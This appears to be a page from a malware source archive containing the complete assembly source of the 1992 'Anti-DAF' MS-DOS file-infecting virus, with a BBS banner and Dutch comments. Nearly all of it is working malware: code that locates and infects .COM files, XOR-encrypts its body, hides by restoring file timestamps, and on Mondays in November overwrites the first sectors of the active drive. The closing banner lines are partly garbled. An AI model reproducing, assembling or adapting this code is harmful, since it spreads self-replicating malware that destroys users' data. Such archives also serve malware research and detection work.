MalwareSourceCode/MSDOS/A-Index/Virus.MSDOS.Unknown.anti_daf.asm

291 lines
11 KiB
NASM
Raw Normal View History

2022-08-21 09:07:57 +00:00
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* The Anti_DAF Virus *
;* *
;* Assembled with Tasm 2.5 *
;* *
;* (c) 1992 Dark Helmet & The Virus Research Centre, The Netherlands *
;* The author takes no responsibilty for any damages caused by the virus *
;* *
;* Special greetings and thanx to : *
;* Glenn Benton, XSTC for their nice source and viruses, *
;* Peter Venkman for his BBS, Guns and Roses for their great music, *
;* and al the other viruswriters... *
;* *
;* "Dark Helmet strikes back..." *
;* *
;*--------------------------------------------------------------------------*
;* *
;* NOTE : This virus will overwrite the first sectors of the active drive *
;* on any monday in November. *
;* *
;* Coming soon : CIVIL WAR II *
;* *
;*--------------------------------------------------------------------------*
;* *
;* Het Anti-DAF virus is hoofzakelijk gebaseerd op The Navigator virus *
;* De encryptie die bij Anti-DAF gebruikt wordt is gebaseerd *
;* op de encryptie zoals deze door Glenn Benton gebruikt is *
;* bij het 'RTL4/Wedden dat virus'. *
;* Om de controleren of een file geinfecteerd is worden de 4e, 5e en 6e *
;* bytes aan het begin gebruikt. *
;* *
;* XOR de 4e en 5e byte *
;* Verhoog resultaat met 1 *
;* Vergelijk met 6e byte *
;* *
;* Is het resultaat gelijk dan is de file al besmet, de 6e byte word ook *
;* voor de decryptie gebruikt. *
;* Verlaag deze waarde met 1 en je hebt de sleutel zoals deze bij de *
;* decrypty in gebruik is. *
;* Het 4e byte word bepaald uit de lengte van de file + 1. *
;* De 5e byte word bepaald door het aantal seconden van *
;* de systeemtijd te pakken. *
;* *
;* Dark Helmet *
;* *
;****************************************************************************
.Radix 16
Anti_DAF Segment
Assume cs:Anti_DAF, ds:Anti_DAF
org 100h
len equ offset last - begin
vir_len equ offset last - vir_start
Dummy: db 0e9h, 03h, 00h
Key: db 000h, 00h, 01h
Begin: call virus ; IP op stack
Virus: pop bp ; Haal IP van Stack
sub bp,109h
lea si,vir_start+[bp] ; voor decryptie
mov di,si
mov cx,vir_len ; lengte decryptie gedeelte
mov ah,ds:[105h] ; haal sleutel op
dec ah ; sleutel met 1 verminderen
; voor decryptie
decrypt: lodsb ; decrypt virus
xor al,ah
stosb
loop decrypt
vir_start: mov dx,0fe00h ; verplaats DTA
mov ah,1ah
int 21h
restore_begin: mov di,0100h ; herstel begin programma
lea si,ds:[buffer+bp]
mov cx,06h
rep movsb
mov ah,2ah ;kijk of het een maandag
int 21h ;in november is
cmp dh,00bh
jne no_activate
cmp al,01h
jne no_activate
activate: mov ah,09h ; activeer het virus :-)
lea dx,[text+bp] ; druk text af
int 21h
mov ah,19h ; vraag drive op
int 21h
mov dx,0 ; overschrijf eerste sectors
mov cx,10h ; van huidige drive
mov bx,0
int 26h
jmp exit
no_activate: lea dx,[com_mask+bp] ; zoekt eerste .COM program
mov ah,04eh ; in directorie
xor cx,cx
int 21h
Open_file: mov ax,03d02h ; open gevonden file
mov dx,0fe1eh
int 21h
mov [handle+bp],ax
xchg ax,bx
Read_date: mov ax,05700h ;lees datum/tijd file
int 21h ;en bewaar deze
mov [date+bp],dx
mov [time+bp],cx
Check_infect: mov bx,[handle+bp] ; kijkt of al geinfecteerd
mov ah,03fh
mov cx,06h
lea dx,[buffer+bp]
int 21h
mov al,byte ptr [buffer+bp]+3
xor al,byte ptr [buffer+bp]+4
inc al
cmp al,byte ptr [buffer+bp]+5
jne infect_file
Close_file: mov bx,[handle+bp] ; sluit file
mov ah,3eh
int 21h
Next_file: mov ah,4fh ; zoekt volgende file
int 21h
jnb open_file
jmp exit ; geen meer gevonden,
; ga naar exit
Infect_file: mov ax,word ptr [cs:0fe1ah] ; lees lengte van file in
sub ax,03h
mov [lenght+bp],ax ; sla lengte op voor sprong
; instructie zodadelijk
inc al ; verhoog AL, eerste key
mov [key1+bp],al
mov ah,2ch ; vraag systeemtijd op
int 21h
mov [key2+bp],dh ; gebruik seconden voor tweede
; key
mov al,dh
xor al,[key1+bp] ; derde sleutel en sleutel
; voor encrypty is een xor
; van key1 en key2
mov [sleutel+bp],al
lea si,vir_start+[bp]
mov di,0fd00h ; encrypt hele zooi aan het
; einde van het segment
mov cx,vir_len
Encrypt: lodsb ; de encryptie
xor al,[sleutel+bp]
stosb
loop encrypt
mov al,[sleutel+bp]
inc al
mov [sleutel+bp],al
Write_jump: mov ax,04200h ; schrijf de jmp die het
call move_pointer ; die het virus aan het begin
mov ah,40h ; maakt
mov cx,01h
lea dx,[jump+bp]
int 21h
mov ah,40h ; schrijf de offset die de jmp
mov cx,02h ; maakt
lea dx,[lenght+bp]
int 21h
mov ah,40 ; schrijf de sleutels weg
mov cx,03h
lea dx,[key1+bp]
int 21h
Write_virus: mov ax,4202h ; schrijf virus gedeelte
call move_pointer ; tot vir_start
mov ah,40h
mov cx,len - vir_len
lea dx,[begin+bp]
int 21h
mov ah,40h ; schrijf het encrypte virus
mov cx,vir_len ; achter de rest van het virus
mov dx,0fd00h
int 21h
restore_date: mov dx,[date+bp] ; herstel datum/tijd
mov cx,[time+bp] ; geinfecteerde file
mov bx,[handle+bp]
mov ax,05701h
int 21h
exit: mov bx,0100h ; continu met orgineel
jmp bx ; orgineel programma
;----------------------------------------------------------------------------
move_pointer: mov bx,[handle+bp]
xor cx,cx
xor dx,dx
int 21h
ret
;----------------------------------------------------------------------------
com_mask db "*.com",0
handle dw ?
date dw ?
time dw ?
buffer db 090h,0cdh,020h,044h,048h,00h
lenght dw ?
jump db 0e9h,0
text db 0ah,0ah,0dh,"The Anti-DAF virus",0ah,0dh
db "DAF-TRUCKS Eindhoven",0ah,0dh
db "Hugo vd Goeslaan 1",0ah,0dh
db "Postbus 90063",0ah,0dh
db "5600 PR Eindhoven, The Netherlands",0ah,0dh
db 0ah,"DAF sucks...",0ah,0dh
db "(c) 1992 Dark Helmet & The Virus Research Centre",0ah,0dh,"$",0
key1 db 00
key2 db 00
sleutel db 00
last db 090h
Anti_DAF ends
end dummy
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>;